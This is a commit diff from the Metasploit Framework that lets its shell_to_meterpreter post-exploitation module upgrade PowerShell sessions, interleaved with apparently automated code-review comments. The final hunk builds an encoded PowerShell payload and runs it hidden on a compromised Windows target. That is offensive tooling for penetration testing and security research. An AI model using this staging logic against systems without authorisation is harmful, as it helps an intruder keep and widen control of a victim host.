Land #5948, @bcook-r7's fix shell_to_meterpreter from powershell

bug/bundler_fix
jvazquez-r7 2015-10-02 15:59:43 -05:00
commit c967b60bf8
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
5 changed files with 48 additions and 14 deletions


@ -27,6 +27,13 @@ class Msf::Sessions::PowerShell < Msf::Sessions::CommandShell
"powershell" "powershell"
end end
#
# Returns the session platform.
#
def platform
"win"
end
# #
# Returns the session description. # Returns the session description.
# #
@ -37,7 +44,7 @@ class Msf::Sessions::PowerShell < Msf::Sessions::CommandShell
# #
# Takes over the shell_command of the parent # Takes over the shell_command of the parent
# #
def shell_command(cmd) def shell_command(cmd, timeout = 1800)
# insert random marker # insert random marker
strm = Rex::Text.rand_text_alpha(15) strm = Rex::Text.rand_text_alpha(15)
endm = Rex::Text.rand_text_alpha(15) endm = Rex::Text.rand_text_alpha(15)
@ -45,7 +52,6 @@ class Msf::Sessions::PowerShell < Msf::Sessions::CommandShell
# Send the shell channel's stdin. # Send the shell channel's stdin.
shell_write(";'#{strm}'\n" + cmd + "\n'#{endm}';\n") shell_write(";'#{strm}'\n" + cmd + "\n'#{endm}';\n")
timeout = 1800 # 30 minute timeout
etime = ::Time.now.to_f + timeout etime = ::Time.now.to_f + timeout
buff = "" buff = ""
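Review bot: The new `timeout = 1800` default on `shell_command` drops the `# 30 minute timeout` explanation that the removed line carried, and nothing now states the unit or what happens when a caller hands in nil, which `etime = ::Time.now.to_f + timeout` would turn into a TypeError. I would extend the method comment with `# @param timeout [Integer] seconds to wait for the end marker before giving up (1800 = 30 minutes)` and, since the new Msf::Post::Common caller forwards its own `time_out` value, either guard with `timeout ||= 1800` before computing `etime` or document that nil is not accepted. The remainder of shell_command, including the read loop that consumes `etime` and `buff`, lies outside the hunk.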


@ -147,7 +147,6 @@ module Exploit::Powershell
# @param ps_code [String] Powershell code # @param ps_code [String] Powershell code
# @param payload_arch [String] The payload architecture 'x86'/'x86_64' # @param payload_arch [String] The payload architecture 'x86'/'x86_64'
# @param encoded [Boolean] Indicates whether ps_code is encoded or not # @param encoded [Boolean] Indicates whether ps_code is encoded or not
#
# @return [String] Wrapped powershell code # @return [String] Wrapped powershell code
def run_hidden_psh(ps_code, payload_arch, encoded) def run_hidden_psh(ps_code, payload_arch, encoded)
arg_opts = { arg_opts = {


@ -198,6 +198,13 @@ module Msf::Post::Common
end end
process.close process.close
when /powershell/
if args.nil? || args.empty?
o = session.shell_command("#{cmd}", time_out)
else
o = session.shell_command("#{cmd} #{args}", time_out)
end
o.chomp! if o
when /shell/ when /shell/
if args.nil? || args.empty? if args.nil? || args.empty?
o = session.shell_command_token("#{cmd}", time_out) o = session.shell_command_token("#{cmd}", time_out)
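Review bot: The new `when /powershell/` branch only behaves correctly because it sits ahead of `when /shell/`, whose pattern also matches the string 'powershell'; that ordering constraint is invisible to the next person who reorders the case, so I would put `# must stay ahead of /shell/: that pattern also matches 'powershell'` directly above it. The two calls in the branch differ only in the command string, so `o = session.shell_command(args.nil? || args.empty? ? "#{cmd}" : "#{cmd} #{args}", time_out)` would keep the existing `"#{cmd}"` coercion while removing the duplication, though matching the shape of the shell branch below is also defensible. The enclosing `case` and the method it belongs to start outside the hunk, so what is matched against and what `time_out` defaults to cannot be seen here.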


@ -1921,12 +1921,12 @@ class Core
session.response_timeout = response_timeout session.response_timeout = response_timeout
end end
begin begin
if session.type == 'shell' if ['shell', 'powershell'].include?(session.type)
session.init_ui(driver.input, driver.output) session.init_ui(driver.input, driver.output)
session.execute_script('post/multi/manage/shell_to_meterpreter') session.execute_script('post/multi/manage/shell_to_meterpreter')
session.reset_ui session.reset_ui
else else
print_error("Session #{sess_id} is not a command shell session, skipping...") print_error("Session #{sess_id} is not a command shell session, it is #{session.type}, skipping...")
next next
end end
ensure ensure
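Review bot: The literal in `if ['shell', 'powershell'].include?(session.type)` is rebuilt on every pass of what looks like a per-session loop (the `next` two lines below suggests one) and reads better as the word list `%w[shell powershell].include?(session.type)`; if the set of shell-like session types grows, a frozen constant on Core would keep it in one place rather than repeating the enumeration that cmd_exec now also performs with regexes. The reworded print_error is a clear improvement because it names the session type that was skipped. The surrounding loop and the body of the `ensure` are outside the hunk.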


@ -128,15 +128,37 @@ class Metasploit3 < Msf::Post
case platform case platform
when 'win' when 'win'
if (have_powershell?) && (datastore['WIN_TRANSFER'] != 'VBS') if session.type == 'powershell'
vprint_status("Transfer method: Powershell") template_path = File.join(Msf::Config.data_directory, 'templates', 'scripts')
psh_opts = { :prepend_sleep => 1, :encode_inner_payload => true, :persist => false } psh_payload = case datastore['Powershell::method']
cmd_exec(cmd_psh_payload(payload_data, psh_arch, psh_opts)) when 'net'
else Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload_data)
print_error('Powershell is not installed on the target.') if datastore['WIN_TRANSFER'] == 'POWERSHELL' when 'reflection'
vprint_status("Transfer method: VBS [fallback]") Rex::Powershell::Payload.to_win32pe_psh_reflection(template_path, payload_data)
exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data) when 'old'
aborted = transmit_payload(exe) Rex::Powershell::Payload.to_win32pe_psh(template_path, payload_data)
when 'msil'
fail RuntimeError, 'MSIL Powershell method no longer exists'
else
fail RuntimeError, 'No Powershell method specified'
end
# prepend_sleep => 1
psh_payload = 'Start-Sleep -s 1;' << psh_payload
encoded_psh_payload = encode_script(psh_payload)
cmd_exec(run_hidden_psh(encoded_psh_payload, psh_arch, true))
else # shell
if (have_powershell?) && (datastore['WIN_TRANSFER'] != 'VBS')
vprint_status("Transfer method: Powershell")
psh_opts = { :prepend_sleep => 1, :encode_inner_payload => true, :persist => false }
cmd_exec(cmd_psh_payload(payload_data, psh_arch, psh_opts))
else
print_error('Powershell is not installed on the target.') if datastore['WIN_TRANSFER'] == 'POWERSHELL'
vprint_status("Transfer method: VBS [fallback]")
exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data)
aborted = transmit_payload(exe)
end
end end
when 'python' when 'python'
vprint_status("Transfer method: Python") vprint_status("Transfer method: Python")